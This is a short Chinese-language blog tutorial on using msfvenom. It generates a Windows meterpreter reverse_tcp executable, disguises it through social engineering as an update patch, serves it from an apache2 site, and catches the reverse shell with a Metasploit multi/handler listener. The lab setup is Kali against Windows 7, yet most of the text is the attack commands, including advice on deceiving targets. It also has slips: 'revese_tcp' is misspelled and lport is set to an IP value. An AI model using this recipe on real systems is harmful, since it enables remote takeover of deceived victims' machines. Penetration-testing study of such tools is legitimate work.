MSFVENOM的使用

#江南的江

#每日鸡汤:泪水和汗水的化学成分相似,但前者只能为你换来同情,后则却可以为你赢得成功。

#初心和目标:争取拿到7ools 的账号。

MSFVENOM

Msfvenom是一个自定义的载荷系统,他是基于msf框架下的附属软件,例如他可以将载荷制成exe文件,然后经过对目标的输出或者社会工程,来对目标进行控制。

实验环境:

攻击机kali

目标windows7(目标不做特殊要求,主要没有安装杀毒和启动病毒防护就行)

先用kali,msfvenom -p windows/meterpreter/revese_tcp

Lhost=XXX.XXX.XXX.XXX     lport=5555  -f exe > (指定一个文件名且后缀为exe的)test.exe

那么如何让目标获得这个文件呢?这要靠你的社会工程学

例如把名字改的好点像是什么更新补丁什么的。

接着我们用apache2来创建一个网站,然后用这个网站达到让目标获得文件的效果

在让目标进行之前先打开msfconsole进行监听

用的是use exploit/multi/handler

Set lhost XXX.XXX.XXX.XXX

Set lport XXX.XXX.XXX.XXX

上面的这些值是你预先在exe文件中设置好的。

然后再设置相应的攻击载荷:

Set payload windows/meterpreter/reverse_tcp

Run

出现这个就表明正在监听,然后让目标打开并使用test.exe文件

成功打入

下面就可以自由的利用吗meterpreter工具箱了

你可能感兴趣的:(KALI,msfvenom,渗透测试,msf框架)